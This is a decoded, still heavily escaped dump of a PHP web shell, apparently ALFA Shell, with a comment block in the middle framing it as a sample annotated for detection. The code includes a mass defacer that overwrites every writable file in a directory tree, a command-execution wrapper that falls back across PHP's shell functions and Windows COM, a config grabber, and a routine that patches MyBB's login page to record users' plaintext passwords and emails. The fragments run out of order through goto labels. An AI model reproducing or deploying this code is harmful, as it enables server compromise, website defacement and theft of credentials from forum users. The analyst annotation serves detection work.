"\x3c\143\x65\x6e\164\x65\x72\x3e\x3c\142\x3e\x3c\142\x69\147\76\x68\164\141\143\143\x65\163\163\x20\146\x6f\x72\40\x4c\x69\164\145\163\160\145\x65\144\x20\x63\162\145\x61\x74\x65\x64\x2e\56\56\x21\x3c\x2f\x63\x65\x6e\x74\x65\x72\76\x3c\x2f\142\x3e\x3c\x2f\142\151\x67\76"; } echo "\74\x62\162\x3e\x3c\57\x64\151\x76\x3e"; alfafooter(); } goto EoAWA; K8RV4: function alfaMassDefacer() { alfahead(); AlfaNum(5, 6, 7, 8, 9, 10); echo "\x3c\144\x69\x76\x20\143\154\141\163\163\x3d\x68\x65\141\144\145\162\76\74\x63\x65\x6e\164\145\x72\76\74\160\76\x3c\x64\151\166\x20\x63\x6c\141\163\163\75\47\164\x78\x74\x66\157\156\x74\137\150\145\x61\x64\x65\x72\x27\x3e\174\40\115\x61\x73\163\40\x44\145\146\141\143\x65\x72\40\x7c\74\57\x64\151\x76\76\74\57\160\x3e\74\x66\x6f\x72\155\x20\157\x6e\x53\165\142\x6d\x69\164\x3d\42\x67\x28\47\x4d\x61\x73\163\x44\145\x66\141\x63\x65\162\x27\x2c\x6e\165\154\x6c\x2c\164\150\151\163\56\155\141\163\x73\x64\x69\x72\x2e\x76\x61\x6c\x75\x65\54\164\x68\151\x73\56\144\x65\x66\x70\141\147\145\x2e\166\141\x6c\x75\145\54\164\150\151\x73\x2e\x6d\x65\x74\150\157\144\56\166\141\x6c\x75\145\x2c\x27\x3e\76\x27\x29\x3b\x72\145\x74\165\162\156\40\146\141\x6c\x73\145\x3b\x22\40\x6d\145\164\x68\157\x64\x3d\x27\160\x6f\x73\164\x27\x3e"; echo 
"\74\144\x69\x76\x20\x63\154\x61\163\163\x3d\42\164\x78\x74\146\157\156\x74\x22\76\x44\x65\x66\141\x63\145\x20\115\145\x74\150\157\144\x3a\40\x3c\x73\145\x6c\145\143\x74\x20\156\141\x6d\x65\x3d\42\x6d\x65\164\x68\157\144\x22\x3e\74\157\160\164\151\157\x6e\40\x76\x61\154\x75\x65\75\42\x69\156\x64\x65\x78\42\76\x44\145\146\x61\143\145\x20\111\x6e\144\145\x78\x20\x44\151\x72\163\74\57\157\x70\164\x69\157\156\x3e\74\x6f\x70\x74\x69\157\156\x20\166\141\x6c\165\145\75\42\141\x6c\x6c\x22\76\x41\154\154\x20\x46\x69\154\145\x73\x3c\57\157\x70\x74\x69\157\156\76\74\57\163\145\x6c\x65\143\x74\x3e\xa\11\115\x61\x73\163\40\x64\x69\x72\x3a\x20\x3c\x69\x6e\x70\x75\164\x20\x73\x69\x7a\145\x3d\42\65\60\x22\40\x69\144\x3d\x22\x74\x61\x72\x67\145\164\42\40\x74\171\160\145\x3d\42\x74\145\x78\x74\42\x20\156\x61\155\145\75\x22\x6d\141\163\163\x64\x69\162\x22\x20\166\141\x6c\x75\x65\x3d\x22" . htmlspecialchars($GLOBALS["\143\x77\x64"]) . "\x22\x3e\12\x9\x44\145\146\x50\x61\147\x65\72\x20\74\x69\x6e\x70\165\x74\x20\163\151\172\145\75\x22\65\x30\42\40\x74\x79\x70\x65\x3d\x22\x74\145\x78\x74\x22\x20\156\x61\155\x65\x3d\x22\144\145\146\160\x61\147\x65\x22\x20\x76\141\154\165\145\x3d\42" . htmlspecialchars($GLOBALS["\x63\x77\144"]) . "\42\x3e\x3c\57\144\x69\x76\76\x20\x3c\x69\156\x70\x75\x74\x20\164\171\160\145\x3d\42\x73\x75\x62\x6d\151\164\42\x20\156\x61\x6d\145\75\42\142\164\x6e\42\40\166\x61\154\x75\x65\x3d\x22\x20\42\x3e\74\57\143\x65\156\164\x65\162\76\x3c\x2f\x70\76\12\x3c\57\146\157\x72\x6d\76"; $dir = $_POST["\x61\x6c\146\141\x31"]; $defpage = $_POST["\x61\x6c\146\x61\x32"]; $method = $_POST["\x61\154\x66\x61\63"]; $fCurrent = $GLOBALS["\137\137\146\151\x6c\145\137\160\x61\x74\x68"]; if ($_POST["\x61\154\x66\141\x34"] == "\76\76") { if (!empty($dir)) { if (@is_dir($dir)) { if (@is_readable($dir)) { if (@is_file($defpage)) { if ($dh = @opendir($dir)) { echo __pre(); while (($file = @readdir($dh)) !== false) { if ($file == "\x2e\56" || $file == "\x2e") { continue; } $newfile = $dir . 
$file; if ($fCurrent == $newfile) { continue; } if (@is_dir($newfile)) { Alfa_ReadDir($newfile, $method, $defpage); } else { if (!@is_writable($newfile)) { continue; } if (!@is_readable($newfile)) { continue; } Alfa_Rewriter($newfile, $file, $defpage, $method); } } closedir($dh); } else { __alert("\74\x66\157\156\x74\x20\x63\x6f\x6c\x6f\x72\x3d\x22\162\x65\144\x22\x3e\105\162\x72\x6f\162\x20\111\156\x20\117\x70\145\156\x44\x69\162\x2e\56\56\74\x2f\x66\157\156\164\x3e"); } } else { __alert("\74\x66\x6f\156\164\x20\x63\157\x6c\157\162\75\42\162\145\144\42\76\104\x65\146\x50\x61\147\x65\x20\x46\x69\154\145\x20\116\157\164\106\x6f\165\x6e\144\x2e\56\56\x3c\x2f\146\x6f\156\x74\x3e"); } } else { __alert("\74\146\x6f\156\164\40\x63\157\154\x6f\x72\75\42\x72\x65\x64\42\x3e\x44\x69\x72\x65\143\164\x6f\x72\x79\x20\x69\x73\40\156\157\x74\40\122\145\141\144\x61\x62\154\x65\56\56\x2e\74\57\x66\157\156\x74\76"); } } else { __alert("\x3c\x66\157\156\164\40\x63\x6f\x6c\x6f\162\75\x22\162\145\144\42\76\x4d\x61\163\x73\x20\104\151\162\40\151\x73\x20\x49\x6e\x76\141\x6c\151\x64\40\104\151\x72\56\56\x2e\74\x2f\146\x6f\156\x74\76"); } } else { __alert("\74\x66\157\156\x74\x20\143\x6f\x6c\157\x72\x3d\x22\162\145\x64\x22\x3e\x44\x69\162\40\x69\163\40\105\x6d\160\164\171\x2e\56\56\x3c\57\x66\157\156\164\x3e"); } } echo "\74\57\144\x69\166\76"; alfafooter(); } goto Xrfh9; L6Kl6: function _AlfaSecretKey() { $secret = @$_COOKIE["\x41\154\x66\141\x53\145\x63\162\x65\x74\x4b\x65\171"]; if (!isset($_COOKIE["\x41\154\146\141\x53\145\143\x72\x65\x74\113\145\171"])) { $secret = uniqid(mt_rand(), true); __alfa_set_cookie("\x41\154\x66\x61\123\145\143\x72\145\164\x4b\145\x79", $secret); } return $secret; } goto PuSe1; KtNd0: function _alfa_php_cmd($in, $re = false) { $out = ''; try { if ($re) { $in = $in . 
"\x20\62\76\x26\61"; } if (function_exists("\145\x78\x65\x63")) { @exec($in, $out); $out = @join("\12", $out); } elseif (function_exists("\160\x61\x73\163\x74\x68\x72\x75")) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists("\163\x79\163\x74\x65\x6d")) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists("\x73\x68\x65\x6c\154\137\x65\x78\x65\x63")) { $out = shell_exec($in); } elseif (function_exists("\160\157\160\145\156") && function_exists("\160\143\154\x6f\163\x65")) { if (is_resource($f = @popen($in, "\162"))) { $out = ''; while (!@feof($f)) { $out .= fread($f, 1024); } pclose($f); } } elseif (function_exists("\x70\162\157\x63\x5f\x6f\x70\145\x6e")) { $pipes = array(); $process = @proc_open($in . "\40\x32\x3e\x26\61", array(array("\x70\151\160\145", "\167"), array("\x70\x69\x70\x65", "\x77"), array("\160\151\160\x65", "\x77")), $pipes, null); $out = @stream_get_contents($pipes[1]); } elseif (class_exists("\x43\117\x4d")) { $alfaWs = new COM("\x57\123\x63\162\x69\160\164\x2e\163\x68\x65\x6c\x6c"); $exec = $alfaWs->exec("\x63\x6d\144\x2e\145\x78\145\x20\x2f\143\40" . 
$_POST["\x61\154\146\x61\x31"]); $stdout = $exec->StdOut(); $out = $stdout->ReadAll(); } } catch (Exception $e) { } return $out; } goto GIU6h; qpgQy: function hijackMybb($path, $saveto) { $code = "\x24\x61\x6c\146\141\x5f\x71\x20\75\x20\x24\144\x62\x2d\x3e\x71\x75\x65\x72\x79\50\x22\123\105\x4c\x45\x43\124\x20\x60\x65\155\x61\x69\154\x60\40\106\x52\x4f\115\x20\42\56\124\x41\x42\114\105\137\x50\122\x45\106\111\x58\x2e\x22\x75\x73\x65\x72\x73\40\x57\x48\105\x52\x45\40\140\x75\163\145\x72\x6e\141\155\145\140\x20\x3d\x20\47\x22\56\44\165\x73\x65\x72\x5b\x27\165\163\x65\162\x6e\141\x6d\x65\47\x5d\x2e\x22\47\x22\51\73\x24\x61\x6c\x66\x61\137\x66\145\164\x63\150\x20\75\x20\44\144\x62\55\x3e\x66\x65\164\x63\150\137\141\x72\162\141\171\x28\x24\x61\x6c\x66\141\137\x71\x29\73\44\141\x6c\146\141\137\x66\x69\x6c\145\x20\x3d\x20\42\173\x73\x61\x76\145\x74\x6f\137\x70\x61\x74\150\x7d\x22\x3b\44\146\160\40\75\x20\100\146\157\160\x65\x6e\50\x24\x61\154\146\141\137\x66\151\154\x65\x2c\x20\42\x61\x2b\x22\51\73\x40\x66\x77\162\x69\x74\145\x28\x24\146\160\x2c\40\x24\165\163\145\162\133\x27\165\x73\145\162\x6e\141\155\x65\x27\135\x2e\x22\x20\72\x20\x22\x2e\x20\44\165\x73\145\162\133\47\x70\x61\x73\x73\167\157\162\x64\x27\x5d\56\42\40\50\x20\42\x2e\44\x61\154\x66\141\137\x66\145\164\x63\x68\x5b\47\x65\x6d\141\151\154\47\x5d\x2e\x22\40\51\134\x6e\x22\x29\73\x40\146\143\154\x6f\163\145\50\x24\146\160\51\x3b\x24\x66\40\x3d\x20\x40\146\x69\154\x65\x28\44\x61\x6c\x66\x61\137\x66\151\154\145\x29\73\44\156\x65\x77\x20\x3d\x20\141\x72\x72\141\171\x5f\x75\x6e\151\161\165\x65\x28\44\146\x29\73\x24\x66\160\40\75\x20\100\x66\157\160\145\156\x28\x24\x61\x6c\x66\141\137\146\x69\154\145\54\40\x22\x77\x22\51\73\x66\157\x72\145\141\x63\150\50\44\156\x65\167\x20\x61\163\40\x24\166\x61\154\x75\145\163\51\173\x40\146\x77\x72\151\x74\145\50\44\x66\160\54\x20\44\166\141\154\165\x65\163\51\73\175\100\x66\143\x6c\157\x73\145\x28\44\x66\160\x29\x3b"; $find = 
"\x24\154\x6f\147\151\x6e\150\141\x6e\144\154\x65\162\x2d\x3e\x63\157\x6d\160\154\145\x74\x65\x5f\x6c\x6f\147\151\156\50\51\x3b"; $code = str_replace("\173\163\141\166\145\164\x6f\137\160\x61\x74\x68\x7d", $saveto, $code); $login = $path . "\x2f\155\x65\x6d\142\145\162\56\160\150\x70"; $evil_login = "\11" . $code . "\12\11" . $find; if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { $login_replace = str_replace($find, $evil_login, $data_login); @file_put_contents($login, $login_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } goto L8sC_; dptXn: if (!function_exists("\155\x62\137\163\164\162\154\x65\x6e")) { function mb_strlen($str, $c = '') { return strlen($str); } } goto JM3pb; P95rf: function alfaconfig_grabber() { alfahead(); echo "\74\144\151\x76\40\x63\x6c\141\x73\x73\75\150\x65\x61\144\x65\x72\76\x3c\x63\145\x6e\x74\x65\x72\76\x3c\x70\76\74\x64\x69\x76\x20\143\x6c\x61\163\163\75\42\164\x78\x74\x66\x6f\x6e\x74\x5f\150\x65\141\x64\145\162\42\76\x7c\40\x43\157\x6e\x66\x69\x67\x20\107\x72\141\142\142\145\x72\40\x7c\x3c\57\x64\151\x76\76\x3c\x2f\x70\76"; echo 
"\x3c\146\x6f\x72\155\40\x6e\x61\155\145\x3d\x22\163\162\x63\x68\x22\x20\157\156\123\165\142\x6d\151\164\x3d\42\x67\50\47\x63\157\x6e\x66\x69\x67\x5f\x67\162\141\142\x62\x65\162\47\x2c\156\x75\x6c\154\54\156\x75\154\154\x2c\164\150\x69\x73\56\144\151\x72\x2e\166\141\x6c\x75\x65\54\164\x68\x69\163\56\x65\x78\164\56\166\141\154\x75\x65\54\x6e\165\x6c\x6c\x2c\47\x3e\x3e\47\51\73\x72\x65\x74\165\162\x6e\40\146\141\154\163\x65\x3b\42\x20\x6d\145\x74\x68\x6f\144\x3d\47\160\x6f\163\x74\x27\76\xa\x9\x3c\x64\151\x76\x20\x63\x6c\x61\x73\x73\x3d\x22\x74\x78\164\146\x6f\x6e\x74\42\x3e\xa\11\104\x69\x72\x3a\x20\x3c\x69\x6e\x70\165\x74\40\x73\151\x7a\x65\75\42\65\x30\42\x20\x69\x64\75\x22\164\141\162\x67\145\x74\42\x20\164\171\160\145\x3d\42\164\145\170\164\x22\40\x6e\x61\x6d\x65\x3d\x22\144\x69\x72\x22\x20\x76\x61\154\165\145\x3d\42" . $GLOBALS["\x63\x77\x64"] . "\42\x3e\12\11\105\170\x74\72\40\x3c\163\155\141\154\x6c\x3e\74\146\x6f\x6e\x74\x20\x63\x6f\x6c\x6f\162\75\42\162\x65\144\x22\x3e\133\40\52\x20\75\x20\x61\x6c\154\40\105\x78\x74\40\x5d\x3c\57\146\x6f\x6e\x74\76\x3c\57\x73\155\141\x6c\154\x3e\x20\x3c\151\156\160\x75\164\40\x69\144\75\x22\x65\170\164\42\40\x73\164\x79\154\145\x3d\42\164\x65\x78\x74\x2d\x61\x6c\151\147\156\x3a\x63\145\156\164\x65\x72\73\42\x20\164\171\160\x65\x3d\x22\x74\145\x78\164\x22\x20\156\x61\155\x65\x3d\x22\x65\170\x74\42\x20\163\x69\172\x65\75\x22\65\42\x20\166\x61\x6c\165\x65\x3d\x22\x70\x68\x70\x22\76\12\11\74\151\x6e\160\x75\x74\x20\164\x79\x70\145\75\x22\x73\x75\x62\x6d\x69\x74\x22\x20\156\x61\x6d\145\75\42\x62\x74\x6e\x22\x20\x76\141\x6c\165\145\x3d\42\40\x22\76\x3c\57\x64\151\x76\x3e\x3c\57\146\157\x72\x6d\76\x3c\57\x63\145\x6e\x74\145\x72\76\74\x62\162\76"; $dir = $_POST["\141\154\146\141\62"]; $ext = $_POST["\x61\x6c\x66\x61\x33"]; if ($_POST["\141\154\146\x61\x35"] == "\x3e\76") { echo __pre(); Alfa_ConfigGrabber($dir, $ext); } echo "\74\x2f\144\151\x76\76"; alfafooter(); } goto RiRhw; FN_bJ: if 
($GLOBALS["\143\x77\144"][strlen($GLOBALS["\x63\x77\x64"]) - 1] != "\x2f") { $GLOBALS["\143\167\x64"] .= "\x2f"; } goto jL3tA;
/*
 * Analyst note (web shell sample, annotated for detection and triage).
 *
 * The statement that ends on the line above begins at label FN_bJ on the
 * previous line. It appends "/" to $GLOBALS["cwd"] when the last character of
 * that string is not already "/". The three key literals used there
 * ("\143\x77\144", "\x63\x77\x64", "\143\167\x64") all decode to "cwd"; the
 * same string is escaped differently at each occurrence, so a byte signature
 * built from one literal will not match the others. Decode the octal/hex
 * escapes before matching.
 *
 * Label r05Ia (below) normalises the config array $GLOBALS["DB_NAME"]; every
 * array-name literal in the loop decodes to "DB_NAME". It is entered by goto
 * from label K5MFn earlier on the page, which first copies
 * $GLOBALS["oZgNypoPRU"] into $GLOBALS["DB_NAME"].
 *
 * For each entry, the first two characters of the key select a canonical slot:
 *   "us" -> user             "pa" -> pass          "sa" -> safemode
 *   "lo" -> login_page       "sh" -> show_icons    "po" -> post_encryption
 *   "cg" -> cgi_api
 * The entry's value is stored under the canonical key and the original key
 * string is stored under "<canonical>_rand". Keys with any other prefix are
 * left as they are.
 *
 * Only the two-character prefix is compared, so the rest of each original key
 * is free to vary. Presumably it is randomised per build (the "_rand" naming
 * suggests this; confirm against other samples). For hunting rules, the
 * decoded canonical names and this prefix dispatch are therefore a sturdier
 * anchor than the original key names in the config array.
 */
r05Ia: foreach ($GLOBALS["\x44\102\x5f\116\101\115\x45"] as $key => $value) { $prefix = substr($key, 0, 2); if ($prefix == "\x75\x73") { $GLOBALS["\x44\102\x5f\116\101\115\x45"]["\x75\163\145\x72"] = $value; $GLOBALS["\104\102\x5f\116\101\115\105"]["\x75\x73\x65\162\137\x72\x61\x6e\x64"] = $key; } elseif ($prefix == "\x70\x61") { $GLOBALS["\x44\x42\x5f\116\101\x4d\105"]["\x70\141\x73\x73"] = $value; $GLOBALS["\104\102\137\x4e\101\115\x45"]["\160\141\163\x73\x5f\x72\x61\x6e\x64"] = $key; } elseif ($prefix == "\x73\141") { $GLOBALS["\x44\102\137\x4e\101\x4d\105"]["\x73\x61\146\145\155\x6f\144\145"] = $value; $GLOBALS["\104\102\137\x4e\101\x4d\105"]["\163\x61\x66\x65\x6d\157\x64\x65\137\162\141\156\144"] = $key; } elseif ($prefix == "\154\x6f") { $GLOBALS["\x44\102\x5f\116\101\115\x45"]["\154\x6f\x67\x69\x6e\137\160\141\x67\x65"] = $value; $GLOBALS["\x44\x42\x5f\x4e\101\115\105"]["\x6c\x6f\x67\151\156\137\x70\141\147\145\137\x72\141\156\144"] = $key; } elseif ($prefix == "\163\x68") { $GLOBALS["\104\x42\x5f\116\x41\115\105"]["\163\150\157\167\x5f\x69\x63\x6f\x6e\x73"] = $value; $GLOBALS["\x44\x42\x5f\116\x41\x4d\x45"]["\163\x68\157\x77\137\x69\x63\157\156\x73\x5f\162\141\156\x64"] = $key; } elseif ($prefix == "\x70\x6f") { $GLOBALS["\x44\102\x5f\x4e\x41\x4d\105"]["\160\157\163\164\x5f\145\x6e\143\162\x79\x70\x74\x69\x6f\156"] = $value; $GLOBALS["\104\102\137\116\101\115\x45"]["\x70\157\x73\164\x5f\145\x6e\143\162\x79\x70\164\151\157\156\137\162\x61\x6e\x64"] = $key; } elseif ($prefix == "\x63\x67") { $GLOBALS["\x44\102\137\116\x41\115\105"]["\x63\x67\x69\x5f\x61\160\151"] = $value; $GLOBALS["\104\102\x5f\x4e\x41\x4d\105"]["\143\x67\x69\x5f\141\x70\x69\x5f\x72\141\156\x64"] = $key; } } goto GuGa9; qyBzk: ?>

Function Calls

None

Variables

None

Stats

MD5 73ca466eb92a91c6b376d57c96c83aea
Eval Count 0
Decode Time 98 ms